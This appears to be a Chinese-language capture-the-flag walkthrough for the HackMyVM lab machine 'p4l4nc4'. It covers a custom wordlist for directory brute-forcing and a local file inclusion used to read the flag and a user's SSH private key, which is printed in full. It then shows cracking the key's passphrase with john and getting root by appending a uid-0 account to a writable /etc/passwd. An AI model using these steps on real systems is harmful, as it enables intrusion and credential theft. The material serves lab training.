【hackmyvm】p4l4nc4靶场
1. 基本信息^toc
这里写目录标题
- 1. 基本信息^toc
- 2. 信息收集
- 2.1. 端口扫描
- 2.2. 目录扫描
- 3. 提权
靶机链接 https://hackmyvm.eu/machines/machine.php?vm=p4l4nc4
作者 elpensador
难度 ⭐️⭐️⭐️⭐️⭐️
2. 信息收集
2.1. 端口扫描
┌──(root㉿kali)-[~]
└─# nmap 192.168.56.9 -p-
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-12-20 03:02 EST
Nmap scan report for 192.168.56.9
Host is up (0.00080s latency).
Not shown: 65533 closed tcp ports (reset)
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
MAC Address: 08:00:27:7E:89:2A (Oracle VirtualBox virtual NIC)
Nmap done: 1 IP address (1 host up) scanned in 2.14 seconds
2.2. 目录扫描
┌──(root㉿kali)-[~]
└─# dirsearch -u http://192.168.56.9
/usr/lib/python3/dist-packages/dirsearch/dirsearch.py:23: DeprecationWarning: pkg_resources is deprecated as an API. See https://setuptools.pypa.io/en/latest/pkg_resources.html
from pkg_resources import DistributionNotFound, VersionConflict
_|. _ _ _ _ _ _|_ v0.4.3
(_||| _) (/_(_|| (_| )
Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 25 | Wordlist size: 11460
Output File: /root/reports/http_192.168.56.9/_24-12-20_03-03-00.txt
Target: http://192.168.56.9/
[03:03:00] Starting:
D2
[03:03:01] 403 - 277B - /.html
[03:03:01] 403 - 277B - /.htm
[03:03:01] 403 - 277B - /.htpasswds
[03:03:01] 403 - 277B - /.htpasswd_test
[03:03:01] 403 - 277B - /.httr-oauth
[03:03:01] 403 - 277B - /.php
[03:03:03] 403 - 277B - /.ht_wsr.txt
[03:03:17] 200 - 755B - /robots.txt
┌──(root㉿kali)-[~/Desktop/hmv/p4l4nc4]
└─# curl http://192.168.56.9/robots.txt
A palanca-negra-gigante é uma subespécie de palanca-negra. De todas as subespécies, esta destaca-se pelo grande tamanho, sendo um dos ungulados africanos mais raros. Esta subespécie é endémica de Angola, apenas existindo em dois locais, o Parque Nacional de Cangandala e a Reserva Natural Integral de Luando. Em 2002, após a Guerra Civil Angolana, pouco se conhecia sobre a sobrevivência de múltiplas espécies em Angola e, de facto, receava-se que a Palanca Negra Gigante tivesse desaparecido. Em janeiro de 2004, um grupo do Centro de Estudos e Investigação CientÃfica da Universidade Católica de Angola, liderado pelo Dr. Pedro vaz Pinto, obteve as primeiras evidências fotográficas do único rebanho que restava no Parque Nacional de Cangandala, ao sul de Malanje, confirmando-se assim a persistência da população após um duro perÃodo de guerra.
Atualmente, a Palanca Negra Gigante é considerada como o sÃmbolo nacional de Angola, sendo motivo de orgulho para o povo angolano. Como prova disso, a seleção de futebol angolana é denominada de palancas-negras e a companhia aérea angolana, TAAG, tem este antÃlope como sÃmbolo. Palanca é também o nome de uma das subdivisões da cidade de Luanda, capital de Angola. Na mitologia africana, assim como outros antÃlopes, eles simbolizam vivacidade, velocidade, beleza e nitidez visual
翻译
大黑羚是黑羚的一个亚种,在所有亚种中,它以体型巨大而著称,是非洲最稀有的有蹄类动物之一。这个亚种是安哥拉特有的,仅分布在两个地方:坎甘达拉国家公园和卢安多自然保护区。2002年,安哥拉内战结束后,关于安哥拉许多物种的生存情况知之甚少,实际上当时曾担心大黑羚已经灭绝。2004年1月,由安哥拉天主教大学的科学研究中心领导的一个团队,在佩德罗·瓦兹·平托博士的带领下,首次拍摄到了仅存的一个群体的照片,证实了在经历了内战的艰难时期后,这一物种的存续。
目前,大黑羚被视为安哥拉的国象,成为安哥拉人民的骄傲。作为证明,安哥拉的足球队被称为“黑羚队”,而安哥拉航空公司(TAAG)也将这一羚羊作为其标志。此外,“Palanca”还是安哥拉首都罗安达的一个地区名称。在非洲神话中,像其他羚羊一样,它们象征着活力、速度、美丽和视觉的敏锐。
多半就是要做一个字典
┌──(root㉿kali)-[~/Desktop/hmv/p4l4nc4]
└─# echo "A palanca-negra-gigante é uma subespécie de palanca-negra. De todas as subespécies, esta destaca-se pelo grande tamanho, sendo um dos ungulados africanos mais raros. Esta subespécie é endémica de Angola, apenas existindo em dois locais, o Parque Nacional de Cangandala e a Reserva Natural Integral de Luando. Em 2002, após a Guerra Civil Angolana, pouco se conhecia sobre a sobrevivência de múltiplas espécies em Angola e, de facto, receava-se que a Palanca Negra Gigante tivesse desaparecido. Em janeiro de 2004, um grupo do Centro de Estudos e Investigação CientÃfica da Universidade Católica de Angola, liderado pelo Dr. Pedro vaz Pinto, obteve as primeiras evidências fotográficas do único rebanho que restava no Parque Nacional de Cangandala, ao sul de Malanje, confirmando-se assim a persistência da população após um duro perÃodo de guerra. Atualmente, a Palanca Negra Gigante é considerada como o sÃmbolo nacional de Angola, sendo motivo de orgulho para o povo angolano. Como prova disso, a seleção de futebol angolana é denominada de palancas-negras e a companhia aérea angolana, TAAG, tem este antÃlope como sÃmbolo. Palanca é também o nome de uma das subdivisões da cidade de Luanda, capital de Angola. Na mitologia africana, assim como outros antÃlopes, eles simbolizam vivacidade, velocidade, beleza e nitidez visual" | tr ' -' '\n' >words.txt
但是爆破不出来
根据gpt提示我靶机 名字 p4l4nc4
是 palanca
(葡萄牙语中的“羚羊”)的网络变体
我估计这作者就是喜欢用这种变体作为名字
其中比较关键的是 palanca-negra-gigante
生成变体的字典
替换i->1 a->4 e->3 l->1
这里面有一些逗号 我们把逗号也给去掉
因为是linux 还有大小写问题。
把所有大写字母开头的大写字母换成小写添加一份追加到字典
爆破即可发现目录
┌──(root㉿kali)-[~/Desktop/hmv/p4l4nc4]
└─# gobuster dir -u http://192.168.56.9 -w words.txt -x php,html,txt,zip
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.56.9
[+] Method: GET
[+] Threads: 10
[+] Wordlist: words.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.6
[+] Extensions: txt,zip,php,html
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/n3gr4 (Status: 301) [Size: 312] [--> http://192.168.56.9/n3gr4/]
Progress: 1060 / 1065 (99.53%)
===============================================================
Finished
===============================================================
继续爆破这个目录发现一个php文件
┌──(root㉿kali)-[~/Desktop/hmv/p4l4nc4]
└─# gobuster dir -u http://192.168.56.9/n3gr4/ -w words.txt -x php,html,txt,zip
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.56.9/n3gr4/
[+] Method: GET
[+] Threads: 10
[+] Wordlist: words.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.6
[+] Extensions: php,html,txt,zip
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/m414nj3.php (Status: 500) [Size: 0]
/m414nj3.php (Status: 500) [Size: 0]
Progress: 2125 / 2130 (99.77%)
===============================================================
Finished
===============================================================
访问后发现是空的
源代码也是空的
应该是有一个参数
使用 arjun
爆破一下
┌ yu@yu ~ 388ms >>ERROR
└ $ arjun -u http://192.168.112.96/n3gr4/m414nj3.php
_
/_| _ '
( |/ /(//) v2.2.6
_/
Probing the target for stability
Analysing HTTP response for anomalies
Analysing HTTP response for potential parameter names
Logicforcing the URL endpoint
parameter detected: page, based on: http code
Parameters found: page
获取到参数是page
从参数名估计就是一个LFI
先试试
成功
获取一下userflag
┌──(root㉿kali)-[~/Desktop/hmv/p4l4nc4]
└─# curl http://192.168.112.96/n3gr4/m414nj3.php?page=/home/p4l4nc4/user.txt
HMV{6cfb952777b95ded50a5be3a4ee9417af7e6dcd1}
尝试使用data为协议包含失败了
但是可以读取了到 m414nj3
用户的 id_rsa
┌──(root㉿kali)-[~/Desktop/hmv/p4l4nc4]
└─# curl http://192.168.112.96/n3gr4/m414nj3.php?page=/home/p4l4nc4/.ssh/id_rsa
-----BEGIN OPENSSH PRIVATE KEY-----
b3BlbnNzaC1rZXktdjEAAAAACmFlczI1Ni1jdHIAAAAGYmNyeXB0AAAAGAAAABCvTRnNli
2HLc7wYB9S1mbCAAAAEAAAAAEAAAEXAAAAB3NzaC1yc2EAAAADAQABAAABAQCrXZ98DYMr
n/f74/g82lqDkMHkyocXGXn8VaP/N7vD9j5mLSr1uhKGBbxcVm4uGP9k//mmRKlewRl/MZ
nTg0N8MP9vp0O2B9vrwHLz9JekTblv93/VCDpJS78CGkNNOVMRcv2ZB3w7uFm6zxRZxQmH
5HaRNuf795GQSFjybiqmN7Mu78bG/94aQMZZLALYmoyMCYWXGvvHpxRN1dwNsT7If4aNBE
l1HXVrZY1biDOrpJQ7O+eZpD4IKs5/QgKL6w9nBczVcGKkvyms98A5qTa/F43+1CxQE2ng
wPiejJEeJZ0PEkQu3nZTK1k7WpJzVnhpqbHGlwKWbfvMKh27Y2gpAAADwI6Nr+vLoXaEJy
SIRrVjIYFz/C3B17pmpx+lmupFfU6ruVHLE92gweyr9wAd5lxhKX1I6BClhlEoDWkzEBCT
H/4zg2tj84+hzhdVWUy6KaCVbRbuvJYWQNWY4kgfk/3FTnSJFHd+k8CZImN3Xa/9DRVLmg
jytzseFr83bPyOyGSze51kJX4r2ljurDvmcnXfQ4j27zUUmwEKi02VvjLngXbmMnIMDLI3
x/pdFxnyZ0w6wnl/Bg+2gvc54Y2ssMblNMw6HZU4K2TN/c3li3A3hLZsN7QwNIV76X5UeP
dWCOngRsImAmMtyxPKZ0rvYwgDimWunQPy0yJXEPdofL6hrAxFZ6y+jnm+gM7x1fnooSkb
9H5RblfwiOtuTD7bmAu6ApNU0Ul3X2YFPnDLFjo/D0Sj5LcsYDQ+XlTNUwnjHpyMy5VzUz
2vDpiscBd7FpFCHf1lS9bfGMLbhOfdM6TPzpjlOmdRizoVjGCZdXsA4Jg05FpvEFa3KHqM
iJOA9yXhHPROYmOwl5Mu+NTPc+Xbiu7B8TJu/BORoOShhbm7+kQpXM7XHPDKTTnJo+qmsI
Pt9FuQF3wZWIXZ48DmRKJKhB+a9LwuE8ES3wUTVqx/EbAs08V6/uiBYZmorJFSgbPd68AE
xKTK9ObilJKSfS2Ik5/iVIBTUxlAt2foAUpWTlXVNmFfBEhRSk48E8NhcgNqctKWpjKf0R
2gi/Dvpect4LoqKPue5zvN0dNlYSiq/6QK6NqJrJdN7DvsvocL+BcWmmv31erlJOo6A3Zw
CEpmnqVzMTroZSBQv3eEsOFS/+RkJ5ffFRpXGfWPh4Dn/Y++n3wbHNNb97pOd9WV+IlhDV
7btvga8cG9xp3zihOIf308VowcpIp0CSlEqZDBpis5jWY9J3N1+uh3pJHFgqmLxKnqLmzu
u15Kh/+nAV6DTBVxrdhq8HoLAvb7ubAq2ICHALC39X12+J0cLOUMi8UWYawMTFgYnO3ZBD
fb6fZaM9Hr97jREiUEG6vgIcNgn6jtJ3EM3ncxTKe2T8SSYn8pFy9Lqf+lvZ8yo9DkaPl5
ORSVWa+jCKhuClPZY5t8VJC9xXGyz8Wah15Y2pg95nGEub7dgmRlQAIiSxjWsDmaDzIBPo
IkZ5lzxoTvvtL2N1+4ZFprPwUN6y6C6zrXbzQp7Ov0bZc2g9fFiNxu1HvR96rwVNFHbeia
OJEM2NZSUU52PExgYtSXwO5aDy70oKiu0pbifoYOm19hlYwYWOOa6s+oW2FG+aXO8WIeEa
muaZDiXw==
-----END OPENSSH PRIVATE KEY-----
私钥有密码需要爆破
┌──(root㉿kali)-[~/Desktop/hmv/p4l4nc4]
└─# ssh2john id_rsa >hash
┌──(root㉿kali)-[~/Desktop/hmv/p4l4nc4]
└─# john hash --word=/usr/share/wordlists/rockyou.txt
Using default input encoding: UTF-8
Loaded 1 password hash (SSH, SSH private key [RSA/DSA/EC/OPENSSH 32/64])
Cost 1 (KDF/cipher [0=MD5/AES 1=MD5/3DES 2=Bcrypt/AES]) is 2 for all loaded hashes
Cost 2 (iteration count) is 16 for all loaded hashes
Will run 8 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
friendster (id_rsa)
1g 0:00:00:07 DONE (2024-12-20 04:20) 0.1307g/s 83.66p/s 83.66c/s 83.66C/s evelyn..pebbles
Use the "--show" option to display all of the cracked passwords reliably
Session completed.
获取到密码是 friendster
利用密码即可登录到 p4l4nc4
用户
3. 提权
进来后用 history
查看发现 /etc/passwd有写入权限
直接写一个root级别的用户即可
生成密码hash
p4l4nc4@4ng014:/home$ openssl passwd 123456
$1$kUvDgDel$tUYPu5oiI8CqMSfycayS1.
写入到/etc/passwd
p4l4nc4@4ng014:/home$ echo 'root1:$1$kUvDgDel$tUYPu5oiI8CqMSfycayS1.:0:0:root:/root:/bin/bash' >>/etc/passwd
p4l4nc4@4ng014:/home$ su root1
Password:
root@4ng014:/home# whoami
root
这里简单说一下 root用存储在/etc/passwd里面是
root:x:0:0:root:/root:/bin/bash
其中x
是表示此用户的密码存储在/etc/shadow
而不是/etc/passwd
我们利用这个hash替换掉x即可,然后修改一下用户名